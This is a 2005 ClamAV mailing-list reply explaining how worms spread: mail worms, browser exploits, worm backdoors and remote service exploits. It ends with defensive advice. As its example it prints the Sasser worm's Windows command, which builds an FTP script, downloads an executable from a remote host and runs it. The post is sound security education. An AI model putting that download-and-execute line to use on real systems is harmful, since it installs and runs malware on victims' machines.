On 6/9/05, Joanna Roman <[EMAIL PROTECTED]> wrote: > What do you mean by attack here ? Do you mean that the > infected machines try to tftp malwares to your machine > ? I just try to understand how malwares spreaded ? >
there is several possibilities malware can hook your system - mail worms, the problem is infront of the computer, clicking instead of thinking. - browser exploits, the use a flaw in your webbrowser to execute a command and install malicious code - backdoors mails worms leave behind, as mydoom or bagle, you can connect them and upload code - remote exploitable vulnerbilities, you can get a command shell on the remote system, without any userinteraction, and download and execute code - others ( weak passwords on shares, britney_spears_nude.jpg.exe on kazaa ... ) to use remote exploitable vulnerbiltities, the viri have to 'scan' for vulnerable machines, meaning, they try to connect a machine on the port running the vulnerable service, and send the malicious packets (shellcode). there is several possibilities a shellcode can do, it can crash the machine, but that does not help the virus to spread, as he has to try to send a copy of himself to the victims machine. so the virus runs a little http, ftp oder tftp server, serving only himself. and he tells the victim to download itself by creating a windows command shell, he uses to download himself via tftp or ftp, as windows offers a tftp or ftp client per default. if the file is served via http, the shellcode has to make use of a winapi call like downloadurl() or something like that, as there is no commandline tool to download files via http on windows. example: this is used by the sasser virus, he opens a ftp server on port 5554 and asks the victims to download himself from this port. echo off&echo open 123.45.67.89 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get 13108_up.exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&13108_up.exe&echo off&del cmd.ftp&echo on this creates a file "cmd.ftp" with the content open 123.45.67.89 5554 anonymous bin get 13108_up.exe and runs the ftp.exe program with the file as input. ftp -s:cmd.ftp starts the downloaded file 13108_up.exe and deletes the file 'cmd.ftp' del cmd.ftp after successfull transmission, he starts the binary on the remote computer, the transferrd virus will install itself as a system service, create some registry keys, and scan for other vulnerable machines. often viri can exploit more than one weakness, to increase their chance. to defend yourself ... patch your system, run a firewall (even better, run a router), run an av scanner, think before clicking _______________________________________________ http://lurker.clamav.net/list/clamav-users.html